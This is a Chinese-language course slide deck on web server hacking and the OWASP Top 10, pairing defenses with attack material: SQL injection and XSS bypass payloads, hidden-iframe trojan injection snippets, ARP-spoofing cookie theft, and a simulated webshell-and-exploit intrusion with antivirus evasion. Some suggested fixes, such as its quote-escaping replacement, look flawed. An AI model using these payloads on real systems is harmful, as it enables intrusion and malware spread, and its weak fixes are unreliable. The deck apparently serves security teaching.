Hacking Web Servers 資訊工程系所授課講師 : 許振銘協同業師 : 呂守箴
補充資料 : OWASP 網站 : http://www.owasp.org OWASP Testing Guide v3 英文版下載處 http://www.owasp.org/images/5/56/owasp_testing_g uide_v3.pdf 簡體中文版下載處 http://www.owasp.org/images/0/06/ OWASP 测试指南 ( 中文 ).pdf
OWASP TOP 10 Web Application Security Risks (2010) A1: 注入弱點 A6: 錯誤或不安全的系統組態 A2: 跨網站腳本攻擊 (XSS) A7: 網址存取控制失當 A3: 身份驗證缺陷與連線階段管理 A8: 未驗證的轉址與轉送 A4: 不安全的直接物件參考 A9: 不安全的加密儲存方式 A5: 跨網站請求偽造攻擊 (CSRF) A10: 傳輸層保護不足 參考資料 :https://www.owasp.org/index.php/top_10
A1: 注入弱點 說明 : 網站應用程式執行來自外部包括資料庫在內的惡意指令, SQL Injection 與 Command Injection 等攻擊包括在內 因為駭客必須猜測管理者所撰寫的方式, 因此又稱 駭客的填空遊戲
A1: 注入弱點 防護建議 : 使用預存程序, 例如 : Java PreparedStatement(),.NET SqlCommand(), OleDbCommand(), PHP PDO bindparam() 使用 Stored Procedures 嚴密的檢查所有輸入值使用過濾字串函數過濾非法的字元控管錯誤訊息只有管理者可以閱讀控管資料庫及網站使用者帳號權限為何
SQL Injection 利用 引起的原因為網頁程式設計師在撰寫 asp 或 php 程式的時候, 對呼叫 (ADO 連線 ) 後端資料庫的帳號權限太大, 在加上對特殊字串以及語法沒有過濾或者過濾不完全而導致的 其最主要的攻擊目標為資料庫, 以取得下列資訊為主 : 獲取資料庫帳號及密碼獲取作業系統帳號及密碼利用 XP_CmdShell 執行 DOS 指令猜測網頁實體路徑來進行換首頁或上傳 / 下載文件上傳網頁木馬並植入後門
SQL 條件式語法漏洞 主要出現在登入帳號的 asp 或 php 程式上, 利用這個漏洞就可以不需要帳號密碼進入管理畫面 主要為網頁程式設計的瑕疵 : 沒有對單引號 或雙引號 '' 進行過濾 SQL 條件式 and or 的邏輯沒有考慮 SQL 語法的 where 子句所傳入的變數沒有檢查 SQL 語法中 - - 是表示該符號之後的語法或參數變成註解 語法 : or = or a'or'1=1- - 'or1=1- - ''or1=1- - or1=1- - 'ora ='a or = a = a ')or( a ='a
[hacker][web][01] 執行 IE 瀏覽器 Vote 投票系統使用語法觀察結果 執行 IE 瀏覽器 部門薪資查詢程式使用語法觀察結果
網頁應用程式語法 : 有問題版 sql_cmd = "select * from mydatabase where id='" & Request("id") & "' and passwd='" & Request("passwd") & "' 傳入惡意語法後 sql_cmd = "select * from mydatabase where id='" 'or 1=1 -- "' and passwd='" & Request("passwd") & "' 則變成前面的 where 條件為 1=1 而後面的 password 則因 - - 變成註解, 所以就不用密碼可進入
網頁應用程式語法 : 修正版 以程式設計的觀點來看, 將表單或查詢字串直接帶入 SQL 語法, 是一切弊病的源頭, 要徹底排除 SQL 資料隱碼攻擊, 必須從根源對症下藥 也就是必須在取得表單資料後, 針對單引號進行過濾, 然後再組合為 SQL 語法, 例如 : sql_cmd = "select * from mydatabase where id='" & Request("id") & "' and passwd='" & Request("passwd") & "'" 應該改為 myid = Replace(Request("id"),"'","'+chr(34)+'") mypwd = Replace(Request("passwd"),"'","'+chr(34)+'") sql_cmd = "select * from mydatabase where id='" & myid & "' and passwd='" & mypwd & "'"
SQL Injection 相關參考網址 SQL Injection ( 資料隱碼 ) 駭客的 SQL 填空遊戲 http://www.microsoft.com/taiwan/sql/sql_injection_g1.htm http://www.microsoft.com/taiwan/sql/sql_injection_g2.htm 資料隱碼 SQL Injection 的因應與防範之道 http://www.microsoft.com/taiwan/sql/sql_injection.htm ASCII 碼對照表 http://www.lookuptables.com SQL Injection 檢測工具 ( 無殺傷力 ) http://www.databasesecurity.com/sqlinjection-tools.htm
[server][web][02] 觀察 IIS SQL server ASP 網頁 [hacker][web][02] 執行 IE 瀏覽器 部門薪資查詢程式使用語法 找出資料庫所有欄位資訊異動欄位資料取得資料庫控制權 觀察結果
執行整合式掃描工具 BT5 webshag Windows Wikto Nikto Netsparker OWASP Zed Attack Proxy(ZAP) 觀察結果
A2: 跨網站腳本攻擊 (XSS) 說明 : 網站應用程式直接將來自使用者的執行請求送回瀏覽器執行, 使得攻擊者可擷取使用者的 Cookie 或 Session 資料而能假冒直接登入為合法使用者
A2: 跨網站腳本攻擊 (XSS) 防護建議 : 檢查頁面輸入數值輸出頁面做 Encoding 檢查使用白名單機制過濾, 而不單只是黑名單 PHP 使用 htmlentities 過濾字串.NET 使用 Microsoft Anti-XSS Library
XSS 利用 Cross Site Scripting(XSS) 跨網站功擊 : XSS 產生的原因是由於網頁程式設計師在撰寫程式時, 對於一些變數沒有充份過濾, 直接把使用者所送出的資料送往 Web Sever 執行 這樣的程式流程造成攻擊者可以送出一些特別製造的 Script 語法, 只要成功送往後端執行成功, 便可達成如 : 竊取 cookie 植入網頁木馬等原本不存在的 功能
[hacker][web][03] 執行 IE 瀏覽器 Vote 投票系統 IE 瀏覽器 MYpower 論壇使用語法觀察結果
XSS 的探測和繞過過濾 基本檢測語法 : <script>alert( xss )</script> 如果 <script> 被過濾, 則改用 <img src=javascript:alert( xss )> 如果 javascript: 被過濾, 則用 16 進位的值取代一些關鍵字 <img src= javascript:alert(/xss/) > 也可用空白字元 Tab 添加 <img src= javas cript:alert(/xss/) width=0> 或者用語法的事件與屬性來避免關鍵字被攔截 <img src= # onerror=alert(/xss/)> <img src= # style= xss:expression(alert( xss )); > 例如 :Yahoo Mail 的 XSS 語法 ( 已修正 ) <STYLE onload= alert( cookies exploit! );alert(document.cookie) >
網站 網頁掛馬語法 框架掛馬 : <iframe src= 木馬網址 width=0 height=0></iframe> JScript 文件掛馬 : 首先將以下語法存檔為 xxx.js 然後將此文件利用各種方式上傳到目標處 document.write("<iframe width='0' height='0' src=' 木馬網址 '></iframe>"); 最後 JScript 掛馬的語法為 : <script language=javascript src=xxx.js></script> JScript 變型加密 : <SCRIPT language= JScript.Encode src=http://www.xxx.com/muma.txt></script> muma.txt 可改成任何附檔名 body 掛馬 : <body onload="window.location=' 木馬網址 ';"></body> 隱藏掛馬 : top.document.body.innerhtml = top.document.body.innerhtml + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';
CSS 中掛馬 : 先將製作好的 muma.js 先利用各種方式上傳至目標處 body { background-image: url('javascript:document.write("<script src=http://www.xxx.net/muma.js></script>")')} JAVA 掛馬 : <SCRIPT language=javascript> window.open (" 木馬網址 ","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> 圖片偽裝 : <html> <iframe src=" 網馬網址 " height=0 width=0></iframe> <img src=" 圖片網址 "> </html> 偽裝呼叫 : <frameset rows="444,0" cols="*"> <frame src=" 開啟的網頁 " framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src=" 網馬網址 " frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset> 欺騙超連結網址手法 : <a href="http://www.xyz.com( 迷惑他人超連結網址, 故意顯示這個網址卻連向木馬網址 )" onmouseover="www_163_com(); return true;"> 網頁要顯示的內容 </a> <SCRIPT Language="JavaScript"> function www_xyz_com () { var url=" 真正連的網頁木馬網址 "; open(url,"newwindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=y es,width=800,height=600,left=10,top=10"); } </SCRIPT>
XSS 相關參考網址 Cross Site Scripting questions and answers http://www.cgisecurity.com/articles/xss-faq.shtml Apache Cross Site Scripting Info http://httpd.apache.org/info/css-security/ How to prevent cross-site scripting security issues http://support.microsoft.com/kb/q252985/ Information on Cross-Site Scripting Security Vulnerability http://www.microsoft.com/technet/archive/security/news/crssite.mspx?mfr=true Microsoft Anti-Cross Site Scripting Library V1.0 http://www.microsoft.com/downloads/details.aspx?familyid=9a2b9c92-7ad9-496c-9a89-af08de2e5982&displaylang=en
A3: 身份驗證缺陷與連線階段 管理 說明 : 網站應用程式中自行撰寫的身分驗證相關功能有缺陷 例如, 登入時無加密 SESSION 無控管 Cookie 未保護 密碼強度過弱等等 網站並沒有使用 SSL / TLS 加密, 使用者在使用一般網路或者無線網路時, 被攻擊者使用 Sniffer 竊聽取得 User ID 密碼 SESSION ID 等, 進一步登入該帳號
A3: 身份驗證缺陷與連線階段 管理 防護建議 : 使用完善的 COOKIE / SESSION 保護機制不允許外部 SESSION 登入及修改資訊頁面使用 SSL 加密設定完善的 Timeout 機制驗證密碼強度及密碼更換機制
竊取已驗證的 Facebook Cookies 1. 使用 nmap 確認閘道端 ( 無線網路基地台 ) 的 IP 所在地 2. 使用 arpspoof 進行 ARP 欺騙來讓原本要從無線基地台出去的被害人封包先轉向到攻擊者的電腦 3. 開啟 Firefox 加裝附加元件 Greasemonkey 來執行 cookieinjector 的 script 4. 瀏覽 facebook 網站 ( 但不要登入 ) 確認可以觸發 script 5. 啟動 wireshark 開始側錄從被害人導流過來的封包, 並設定過濾條件只需要 FB 的 cookie ( 該 cookie 就會包含該被害人的帳號與密碼資料 ) 6. 複製被害人封包內的 Text 資料, 並將其貼上的 Firefox 上等待觸發的 script 附加元件 7. 重新整理後 Firefox 就會將原本被害人封包內的帳號密碼等身份資料填入瀏覽器, 偽冒變成對方的身份了
http://www.youtube.com/watch?v=reinqednjru
A4: 不安全的直接物件參考 說明 : 攻擊者利用網站應用程式本身的檔案讀取功能任意存取檔案或重要資料 進一步利用這個弱點分析網站原始碼 系統帳號密碼檔等資訊, 進而控制整台主機 例如 : http://example/read.php?file=../../../../../../../c:\bo ot.ini
A4: 不安全的直接物件參考 防護建議 : 避免將私密物件直接暴露給使用者 驗證所有物件是否為正確物件 使用 Index / Hash 等方法, 而非直接讀取檔案
A5: 跨網站請求偽造攻擊 (CSRF) 說明 : 已登入網站應用程式的合法使用者執行到惡意的 HTTP 指令, 但網站卻當成合法需求處理, 使得惡意指令被正常執行 舉例來說, 攻擊者在網站內放置了, 受害者讀取到此頁面之後, 就會去 server.com 主機執行 send.asp 惡意行為 例如 Web 2.0 時代的社交網站等等, 都是 CSRF 攻擊的天堂
A5: 跨網站請求偽造攻擊 (CSRF) 防護建議 : 確保網站內沒有任何可供 XSS 攻擊的弱點在 Input 欄位加上亂數產生的驗證編碼在能使用高權限的頁面, 重新驗證使用者禁止使用 GET 參數傳遞防止快速散佈使用 Captcha 等技術驗證是否為人為操作
A6: 錯誤或不安全的系統組態 說明 : 系統的安全性取決於應用程式 伺服器 平台的設定 因此所有設定值必須確保安全, 避免預設帳號 密碼 路徑等 甚至被 Google Hacking 直接取得攻擊弱點
A6: 錯誤或不安全的系統組態 防護建議 : 軟體 作業系統是否都有更新到最新版本? 是否都有上最新 Patch? 不需要的帳號 頁面 服務 連接埠是否都有關閉? 預設密碼是否都有更改? 安全設定是否都完備? 伺服器是否都有經過防火牆等設備保護? 各種設備 系統的預設密碼, 都可以在網路上找到一些整理資料 http://www.phenoelit-us.org/dpl/dpl.html
使用可以上網的電腦 觀察預設密碼 http://www.phenoelit-us.org/dpl/dpl.html http://tools88.com/
A7: 網址存取控制失當 說明 : 網頁因為沒有權限控制, 使得攻擊者可透過網址直接存取能夠擁有權限或進階資訊的頁面 例如管理介面 修改資料頁面 個人機敏資訊頁面洩漏等等 舉例來說, /admin /backup /logs /phpmyadmin /phpinfo.php /manage 這些都是常見的路徑及檔案 攻擊者只要猜測到, 就可以操控主機
A7: 網址存取控制失當 防護建議 : HTTP Service 直接限制來源 IP 使用防火牆阻擋密碼授權加密頁面網站架構最佳化
爆庫法取得資料庫 名詞解釋 : 原為大陸用語是指利用強行的手段, 例如 : 在網址列添加特殊字串或路徑, 使目標網站的資料庫實體路徑暴露出來, 進而成功下載該資料庫, 取得帳號密碼等權限之過程 常見手法 : 利用論壇套件其資料庫均固定放至於某 虛擬目錄 中之特性, 輸入關鍵字後下載 ( 註 : 以 access 型態之資料庫居多 ) 把網址列中的 / 換成 %5c 然後送出該網址, 就可以在 Web Server 的錯誤訊息中得到資料庫的實體路徑 註 : 目前只要更新使用新版的論壇套件, 幾乎都已經修正相關弱點
論壇 DB 爆庫 : 原理 Access 資料庫的儲存隱患 : 在 ASP+Access 應用系統中, 如果能獲得或猜到 Access 資料庫的儲存路徑和資料庫名稱, 則該資料庫就可以被下載到本地 例如 : 對於線上書店的 Access 資料庫, 人們一般命名為 book.mdb store.mdb 等, 而存儲的路徑一般為 URL/database 或乾脆放在根目錄 URL/ 之下 這樣, 只要在瀏覽器地址欄中輸入網址 : URL/database/store.mdb, 就可以輕易地把 store.mdb 下載到本地的機器中 Access 資料庫的解密隱患 : 由於 Access 資料庫的加密機制非常簡單, 所以即使資料庫設置了密碼, 解密也很容易 由此可見, 無論是否設置了資料庫密碼, 只要資料庫被下載, 其資訊就沒有任何安全性可言了
Dvbbs 論壇套件爆庫 取得 mdb 後 計算 admin 的 md5 密碼
[hacker][web][04] 執行 Google hacking dvbbs7 mdb site:tw IE 瀏覽器使用語法下載資料庫觀察結果
網際網路 : 外洩管道 : 中毒 : 木馬程式側錄
論壇 DB 爆庫 : 解決方案 非常規命名法 : 不要簡單地命名為 book.mdb 或 store.mdb, 而是要起個非常規的名字, 例如 :faq19jhsvzbal.mdb, 再把它放在如./akkjj16t/kjhgb661/acd/avccx55 之類的深層目錄下 使用 ODBC 資料來源 : 使用 ODBC 資料來源, 不要把資料庫名稱直接寫在 ASP 程式碼中, 例如 : DBPath = Server.MapPath(./akkjj16t/kjhgb661/acd/avccx55/faq19jhsvzbal.mdb ) conn.open driver={microsoft Access Driver (*.mdb)}; dbq= & DBPath 改成 : conn.open ODBC-DSN 名稱 就不會發生這樣的問題了
在 IIS 的設定 : 將放置 Access 資料庫的資料夾 ( 或虛擬目錄 ) 給予 寫入 但不要給予 讀取 的權限即可, 如此一來, 就算知道儲存路徑和資料庫名稱, 一樣無法從 Web 下載 在主目錄 應用程式設定 應用程式對應 新增 執行檔 : C:\WINNT\System32\inetsrv\ism.dll 副檔名 :.mdb 限制於 :GET,POST ( 缺點 : 以後要編修 Access 資料庫, 很容易忘記有鎖權限或鎖副檔名 )
%5c 路徑爆庫 : 原理 它不是網頁本身的漏洞, 而是利用了 IIS 解碼方式中的一個特性, 如果 IIS 安全設定不周全, 而網頁設計者及管理者未考慮 IIS 錯誤時, 就會被人利用 為何要用 "%5c"? 實際上它是 "\" 的十六進位代碼, 也就是 "\" 的另一種表示法 基本上 IE 會自動在網址列就把 "\" 轉變成 "/" 的符號, 使得瀏覽到同一個網址 但是, 當我們把 "/" 換成十六進位寫法 "%5c" 時,IE 卻不會對此符號進行轉換, 問題正是出在這裡
一個典型的 conn.asp 連線語法中如下 :DBPath = Server.MapPath("db/dsvote.mdb") 當 http://192.168.123.100/vote%5cvotelist.asp 瀏覽呼叫 conn.asp 時, 就會在 IIS 解析成 /vote\votelist.asp 在 IIS 中, / 和 \ 代表著不同的意義, 遇到了 \ 時, 認為它已經到了根目錄所在的實體路徑便不再往上層解析, 於是 ASP 就會出錯將網站的完整的實體路徑加在錯誤訊息裡 :'C:\Inetpub\wwwroot\STORE\mood#.asa 註 : 將 mood#.asa 改名為 mood.mdb
投票程式爆庫 取得 mdb 後 計算管理員的 md5 密碼
[hacker][web][05] 執行 Google hacking dvbbs7 mdb site:tw IE 瀏覽器使用語法下載資料庫觀察結果
%5c 路徑爆庫 : 解決方案 修改程式 : 在 conn.asp 檔中呼叫資料庫語法之後要加上 On Error Resume Next 的語法, 它的意思是出錯後, 繼續執行下面語法, 也就是不理會出錯, 當然就不會給出資料庫的錯誤資訊了 修改 Web Server 回報錯誤的畫面 : 在 IIS 內的虛擬目錄 -> 內容 -> 自訂錯誤 -> 選擇錯誤編號 -> 編輯內容 換到預設的網頁即可
A8: 未驗證的轉址與轉送 網頁應用程式經常將使用者 Forward 或 Redirect 至其他頁面或網站, 沒有驗證的機制 攻擊者可將受害者導向至釣魚網站或惡意網站, 甚至存取受限制的資源 例如 : http://example.cc/redir.jsp?url=evil.com http://example.cc/func.jsp?fwd=admin.jsp http://g.msn.com/9se/1?http://xxx.com
A8: 未驗證的轉址與轉送 防護建議 : 非必要時避免使用 Redirect 及 Forward 驗證導向位置及存取資源是合法的
Cookie 欺騙 Cookie 記錄著使用者的帳戶 ID 密碼之類的訊息, 如果在網上傳遞, 通常使用的是 MD5 方法加密 這樣經由加密處理後的訊息, 即使被網路上一些別有用心的人截獲, 也看不懂, 因為他看到的只是一些無意義的字母和數字 然而, 現在遇到的問題是, 截獲 Cookie 的人不需要知道這些字串的含義, 他們只要把別人的 Cookie 向伺服器提交, 並且能夠通過驗證, 他們就可以冒充受害人的身份, 登陸網站 這種方法叫做 Cookie 欺騙 手法 : 截獲他人 Cookie 內的帳號與密碼獲取權限, 搭配其它手法進行 掛馬 等更進一步攻擊
A9: 不安全的加密儲存方式 說明 : 網站應用程式沒有對敏感性資料使用加密 使用較弱的加密演算法或將金鑰儲存於容易被取得之處 加密演算法是安全防護的最後一道防線, 當駭客取得了帳號密碼, 可以簡單的使用一些破解軟體甚至線上服務進行破解 例如 Cain & Abel,MD5 Reverse Lookup 等
A9: 不安全的加密儲存方式 防護建議 : 使用現有公認安全的加密演算法 減少使用已有弱點的演算法, 例如 MD5 / SHA-1, 甚至更簡單的加密法 安全的保存私鑰
A10: 傳輸層保護不足 說明 : 網頁應用程式未在傳輸機敏資訊時提供加密功能, 或者是使用過期 無效的憑證, 使加密不可信賴 例如 : 攻擊者竊聽無線網路, 偷取使用者 cookie; 網站憑證無效, 使用者誤入釣魚網站
A10: 傳輸層保護不足 防護建議 : 盡可能的使用加密連線 Cookie 使用 Secure Flag 確認加密憑證是有效並符合 domain 的後端連線也使用加密通道傳輸
[hacker][web][06] 執行 攻擊前準備 漏洞型木馬 放置跳板 IE 瀏覽器 入侵過程中 Sniffer 取得帳號 上傳網頁型木馬 掛馬 觀察結果
模擬案例 :JS 與論壇掛馬 侵過程 目標 : 入 攻陷 XYZ 公司使該公司之客戶植入木 馬, 完成後竊取個資 觀察 : 該公司除 XYZ 網站外仍在同台 Web Server 中並有架設 Dvbbs 論壇
模擬案例 :JS 與論壇掛馬 侵過程 入侵前準備 : 入 製作 MS04-023 MS06-014 MS07-004 的 Exploits 程式來呼叫木馬 於 JavaScript 中撰寫 document.write( <iframe src= 存放 Exploits 的網址 width=0 height=0></iframe> ); 並存檔為 123.js 來呼叫 Exploits 將 123.js 檔案進行變型及加密來避免被防毒軟體查殺 最後將 MS04-023 MS06-014 MS07-004 的 Exploits 程式及製作好的 123.js 檔案放置於 192.168.123.101 之跳板網站內 Muma 的目錄中備用
模擬案例 :JS 與論壇掛馬 侵過程 入侵中過程 : 入 利用 Sniffer 技巧於 Dvbbs 論壇中截獲輸入於該論壇的 Cookie 利用該 Cookie 內儲存之帳號與密碼所取得之權限, 搭配論壇上傳程式, 將 WebShell (windows.asp) 上傳至該台 Web Server 的論壇目錄中 於 www.xyz.com.tw/dvbbs/windows.asp 中確認 WebShell (windows.asp) 已經成功傳入 目的是利用存放於 Dvbbs 論壇中的 WebShell 來將 XYZ 公司的網站掛馬
模擬案例 :JS 與論壇掛馬 侵過程 入侵中過程 : 撰寫掛馬語法 <script language=javascript src='http://192.168.123.101/muma/123.js'></script> 入 為避免存放 123.js 的跳板網站 URL 網址被阻擋, 將該網址進行 URL 編碼來逃避偵測 <script language=javascript src='http://%31%39%32%2e%31%36%38%2e%31%32%33%2e%31%30%31%2f%6d%75 %6D%61/123.js' > </script> 利用 WebShell (windows.asp) 將語法掛馬後, 查看 XYZ 公司網頁 HTML 原始碼是否有被異動
模擬案例 :JS 與論壇掛馬 侵過程 入侵後感染 : 入 當使用者瀏覽 XYZ 公司的網站後, 變會觸發 HTML 內的掛馬語法 感染流程 : URL 編碼的掛馬語法 轉換 跳板網站中的 123.js 解析 JS 內變型及加密的 Exploits 程式網址 Exploits 程式網址內的木馬程式 植入 還原
WebShell 流程 駭客 知名的官方網站 [ 入侵後上傳 ] Webshell ( 網頁木馬 ) 不知情的一般使用者 首頁 [ 掛馬 ] 將首頁或其他網頁植入 <ifrme> 隱藏框架引導到跳版網站 跳版網站 木馬 掛馬的網頁
手法探討 : 製造相關的木馬並放置在跳板網址主機上 製造觸發 MS04-023 MS06-014 MS07-004 漏洞的語法 尋找具有 SQL Server 漏洞或程式瑕疵上傳 ASP 網馬 (Web Shell) 利用 Web Shell 將所屬網站褂上 <iframe> 等之惡意連結 缺點 : Server 端及 Client 端均須利用很多漏洞, 如果不是管理者太粗心, 不會這麼剛好都中獎 修正相關利用到的漏洞之後該手法就沒效了
進階偽裝 : 首先將測試的 123.exe 上傳到 dropbox 並偽裝成超連結下載
測試語法 : https://dl.dropboxusercontent.com/s/courq4778ipotrw /123.exe?token_hash=AAGJkniXZ56_JdKagTWdIWAHfHlJ B_rSXa1qNz_YZf-DGw&dl=1
網址編碼 :
短網址 :
QR Code:
其它
論壇套件漏洞利用 由於 asp 或 php 簡單易學, 所以網路常常可找尋到相關免費的程式架設論壇網站 但由於安裝程式的管理者常忽略需要修改原始設定及安全性選項, 使得依照 預設值 ( 瘋狂按下一步就會裝好 ) 的資料便可取得該論壇權限, 進而利用 社交工程 取得個人資料 常利用手法 : Cookie 欺騙爆庫法 : 論壇 DB 爆庫爆庫法 :%5c 路徑爆庫 SQL Injecion XSS 惡意超連結至網頁木馬 DDoS
其它套件路徑暴露 本地原產 : ANN 公告系統 : For Unix/Linux, Apache + php + mysql ( 典型的 LAMP) 是一個用 PHP 撰寫的公告程式, 主要用來發佈公告, 作者是 Charles Nextime 因作者本身也是教育從業人員, 所以廣受各教育單位使用該 ANN 公告套件 目前最終版 : V1.29 ( 已不再更新 )
其它套件路徑暴露 : 原因 於該 index.php 程式碼中的判斷式 if (isset($nuke_dir) && $usenuke == 1) { } include("$nuke_dir/mainfile.php"); include("$nuke_dir/header.php"); 指定了 include 的檔案, 這時只要不按照它的邏輯, 即可使該 php 程式發生錯誤, 顯示檔案路徑
其它套件路徑暴露 : 解決方案 修正該公告套件為最終版 修正該公告套件的程式語法 在 php.ini 文件中將下列參數關閉 global_registers = off allow_url_fopen = 0 修改 Apache 遇到 php 程式錯誤時出現的錯誤畫面 例如 : 有任何錯誤都導向一個固定的畫面 註 : 該公告套件於 Index.php 有暴露路徑漏洞 log.inc.php 有 RemoteFileInclude(RFI) 遠端文件引入漏洞, 可利用它植入 WebShell